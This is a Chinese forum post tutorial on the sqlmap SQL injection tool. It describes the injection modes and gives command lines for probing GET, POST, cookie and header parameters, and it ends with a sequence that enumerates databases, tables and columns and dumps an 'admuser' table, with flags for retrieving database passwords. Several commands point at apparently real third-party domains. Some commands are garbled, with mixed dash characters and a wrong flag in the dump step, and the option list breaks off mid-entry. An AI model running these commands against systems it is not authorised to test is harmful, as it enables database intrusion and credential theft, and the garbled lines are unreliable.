|
|
Sqlmap是一款非常强大的SQL注入工具。
下载地址
http://sqlmap.org/
简介
sqlmap支持以下五种不同的注入模式:
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用联盟的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点:
完全支持MySQL,甲骨文,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite,火鸟,Sybase, SAP MaxDB, HSQLDB和Informix等多种数据库管理系统。
更新
python sqlmap.py --update ——更新
检测注入
基本格式
sqlmap -u "http://www.vuln.cn/post.php?id=1″
-u 制定url
sqlmap -u "http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 2
指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)
一共有5级,5级最高,默认为1级,
1-5 :get和post
2:http cookie
3:http User-Agent/Referer
从post数据包中注入
sqlmap -u "http://www.sougou.com/shnews.php" --method POST --data "id=1$passwd=123456" -p id
--method POST:指定提交方式为POST
--data:指定提交的数据
-p:指定SQL注入payload测试的参数
cookie注入
sqlmap -u "http://www.sougou.com/shnews.asp" -p "id" -–cookie –level 2
http头注入
sqlmap -r "1.txt"
-r:将http头信息保存到文件,进行测试
批量扫描注入点
sqlmap -r 1.txt --batch
-m : 批量扫描多个注入点
--batch:自动选择yes,防止中断,不需要人工手动每次都选择yes,no。
注入成功:
获取数据库基本信息
sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbms MySQL --dbs 获取数据库
sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbms MySQL --current-db
查看当前运行的数据库
sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbms MySQL -D my7531691 --tables
获取数据库中的表
sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbms MySQL -D my7531691 -T admuser --columns
获取字段
sqlmap.py -u "http://www.blueber.com/./show_news.php?classid=1&id=459" -p id --dbs MySQL -D my7531691 -T admuser --dump
常用命令:
–is-dba 当前用户权限(是否为root权限)
–dbs 所有数据库
–current-db 网站当前数据库
–users 所有数据库用户
–current-user 当前数据库用户
–passwords 数据库密码
Options(选项):
–version 显示程序的版本号并退出
-h, –help 显示此帮助消息并退出
-v VERBOSE 详细级别:0-6(默认为1)
Target(目标):
-d DIRECT 直接连接到数据库。
-u 目标URL
-r REQUESTFIL |
|
发表于 2022-5-8 20:19:14
